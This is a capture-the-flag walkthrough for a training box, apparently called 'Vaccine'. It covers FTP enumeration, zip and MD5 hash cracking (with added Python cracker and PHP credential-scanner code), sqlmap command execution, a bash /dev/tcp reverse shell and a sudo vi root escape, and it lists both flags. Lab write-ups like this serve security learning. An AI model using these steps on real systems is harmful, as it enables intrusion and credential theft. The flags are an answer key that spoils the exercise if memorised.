Initial Scan

sudo nmap -T4 -Pn -sV -sC -v -oA Vaccine

(-Pn skips host discovery, -sV and -sC run version detection and the default NSE scripts, and -oA Vaccine writes the results in all three formats to Vaccine.nmap, Vaccine.gnmap and Vaccine.xml. The target host goes at the end of the command.)

Task 1

Besides SSH and HTTP, what other service is hosted on this box?

Answer: FTP

Task 2

This service can be configured to allow login with any password for a specific username. What is that username?

Answer: anonymous

Task 3

What is the name of the file downloaded over this service?



Task 4

What script comes with the John The Ripper toolset and generates a hash from a password-protected zip archive in a format that allows for cracking attempts?

Answer: zip2john

zip2john prints the archive's hash in john's input format; redirect that output to a file and feed the file to john with a wordlist.

Task 5

What is the password for the admin user on the website?

Answer: 41852963

Looking at index.html we find the admin user's password hash. Put the hash in a file and crack it with hashcat in straight (dictionary) mode, -a 0, using hash mode 0 (raw MD5) and rockyou as the wordlist:

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt
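The dictionary attack that hashcat command runs, written out in Python as an added example (not code from the original walkthrough). The wordlist below is a constructed stand-in for rockyou.txt, and because the page does not reproduce the hash itself, the target is rebuilt from the recovered password and then cracked back out of the list. crack_md5() walks the wordlist once and checks every candidate digest against all pending targets, which is the reason hashcat can attack many hashes at the cost of one pass.

```python
import hashlib
from typing import Dict, Iterable, Optional

# Constructed stand-in for /usr/share/wordlists/rockyou.txt (assumption: the real
# list is millions of lines; these entries are made up for the example).
WORDLIST = ["password", "123456", "qwerty", "41852963", "letmein", "admin"]


def md5_hex(candidate: str) -> str:
    """Unsalted MD5 hex digest: the hash type hashcat mode 0 (-m 0) attacks."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def is_md5_hash(value: str) -> bool:
    """hashcat rejects hashes that do not fit the mode; raw MD5 is 32 hex chars."""
    value = value.strip()
    return len(value) == 32 and all(c in "0123456789abcdefABCDEF" for c in value)


def crack_md5(target_hashes: Iterable[str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Straight (dictionary) attack, what hashcat -a 0 does: walk the wordlist
    once, hash each candidate, and look the digest up against every target.
    Returns {target_as_given: plaintext or None}; stops early once all are cracked."""
    pending: Dict[str, str] = {}          # normalised digest -> target as given
    for h in target_hashes:
        if not is_md5_hash(h):
            raise ValueError(f"not a raw MD5 hash: {h!r}")
        pending[h.strip().lower()] = h
    results: Dict[str, Optional[str]] = {orig: None for orig in pending.values()}
    for line in wordlist:
        if not pending:
            break
        candidate = line.rstrip("\r\n")   # wordlist files carry newlines
        digest = md5_hex(candidate)
        if digest in pending:
            results[pending.pop(digest)] = candidate
    return results


def crack_one(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Single-hash convenience wrapper around crack_md5()."""
    return crack_md5([target_hash], wordlist)[target_hash]


def crack_hash_file(hash_path: str, wordlist_path: str) -> Dict[str, Optional[str]]:
    """File-based form mirroring `hashcat -a 0 -m 0 hash rockyou.txt`: one hash
    per line in hash_path, one candidate per line in wordlist_path."""
    with open(hash_path, encoding="utf-8") as f:
        hashes = [h.strip() for h in f if h.strip()]
    with open(wordlist_path, encoding="utf-8", errors="ignore") as wl:
        return crack_md5(hashes, wl)


if __name__ == "__main__":
    # The page gives the recovered password but not the hash, so rebuild the
    # hash from the password and crack it back out of the constructed wordlist.
    target = md5_hex("41852963")
    print(f"{target}:{crack_one(target, WORDLIST)}")
```

Run it as a script to see the hash:plaintext pair hashcat would print, or call crack_hash_file("hash", "/usr/share/wordlists/rockyou.txt") with the real files. The early exit on an empty pending set is the difference between cracking one hash and needlessly reading the rest of a multi-gigabyte wordlist.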


Task 6

What option can be passed to sqlmap to try to get command execution via the SQL injection?

Looking at sqlmap's help output (sqlmap -h, or -hh for the full list of options, which includes the operating system access section):

Answer: --os-shell

Task 7

What program can the postgres user run as root using sudo?

Log in to the website as admin and take the session cookie from the browser, then pass it to sqlmap together with the injectable URL and ask for an OS shell:

sqlmap -u '' --cookie="PHPSESSID=n33tru7g83ed1hqdgfm42gnqic" --os-shell

We get our shell, running as the postgres user. Start a listener on the attacking machine and, from the os-shell, run a bash reverse shell pointing at the listener's IP and port:

bash -c "bash -i >& /dev/tcp/ 0>&1"

In the resulting shell, sudo -l lists what postgres may run as root (it asks for the postgres user's password).

Answer: vi

Task 8

Submit user flag

Answer: ec9b13ca4d6229cd5cc1e09980965bf7

Task 9

Submit root flag

Looking at the files in /var/www/html, since the site is written in PHP. In dashboard.php we find the database connection credentials:

user=postgres password=P@s5w0rd!
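The credential hunt above, generalised into a small scanner as an added Python example (not code from the original walkthrough): it pulls libpq connection strings out of pg_connect() calls in PHP source and parses their key=value pairs. The SAMPLE_PHP text is constructed for the example; that dashboard.php uses pg_connect(), and the host, port and dbname values, are assumptions, since the page shows only the user=... password=... fragment.

```python
import os
import re
from typing import Dict, List, Tuple

# Constructed PHP source standing in for dashboard.php. The pg_connect() call
# and the host/port/dbname values are assumptions for the example; the page
# only shows the "user=postgres password=P@s5w0rd!" fragment.
SAMPLE_PHP = '''<?php
session_start();
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
if (!$conn) { die("Connection failed"); }
$result = pg_query($conn, "SELECT * FROM cars");
?>'''

# First argument of pg_connect(): a libpq connection string in single or double
# quotes. A password containing the same quote character as the PHP string
# delimiter would end the match early; PHP would need escaping there too.
PG_CONNECT_RE = re.compile(r'pg_connect\s*\(\s*([\'"])(.*?)\1', re.DOTALL)

# libpq keyword=value tokens; a value may be single-quoted with backslash escapes.
CONNINFO_TOKEN_RE = re.compile(r"(\w+)\s*=\s*('(?:[^'\\]|\\.)*'|\S+)")


def parse_conninfo(conninfo: str) -> Dict[str, str]:
    """Parse a libpq 'key=value key=value' string into a dict, unquoting values."""
    params: Dict[str, str] = {}
    for key, raw in CONNINFO_TOKEN_RE.findall(conninfo):
        if raw.startswith("'") and raw.endswith("'"):
            raw = re.sub(r"\\(.)", r"\1", raw[1:-1])   # strip quotes, unescape \x
        params[key] = raw
    return params


def find_pg_credentials(php_source: str) -> List[Dict[str, str]]:
    """Return one parameter dict per pg_connect() call that carries a user and password."""
    found = []
    for _quote, conninfo in PG_CONNECT_RE.findall(php_source):
        params = parse_conninfo(conninfo)
        if "user" in params and "password" in params:
            found.append(params)
    return found


def scan_webroot(root: str) -> List[Tuple[str, Dict[str, str]]]:
    """Walk a web root (e.g. /var/www/html) and collect (path, params) for every
    PHP file that embeds PostgreSQL credentials."""
    hits: List[Tuple[str, Dict[str, str]]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as f:
                for params in find_pg_credentials(f.read()):
                    hits.append((path, params))
    return hits


if __name__ == "__main__":
    for params in find_pg_credentials(SAMPLE_PHP):
        print(f"user={params['user']} password={params['password']}")
```

On the box itself, scan_webroot("/var/www/html") does what the manual look through dashboard.php did, and the same parser covers the quoted form (password='...') that grep for password= would miss.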

Looking at the options for vi on GTFOBins: with sudo vi we can open a file as root, and from inside vi we can spawn a root shell by setting the shell option and then invoking it:

:set shell=/bin/sh
:shell

Answer: dd6e058e814260bc70e9bbdef2715849
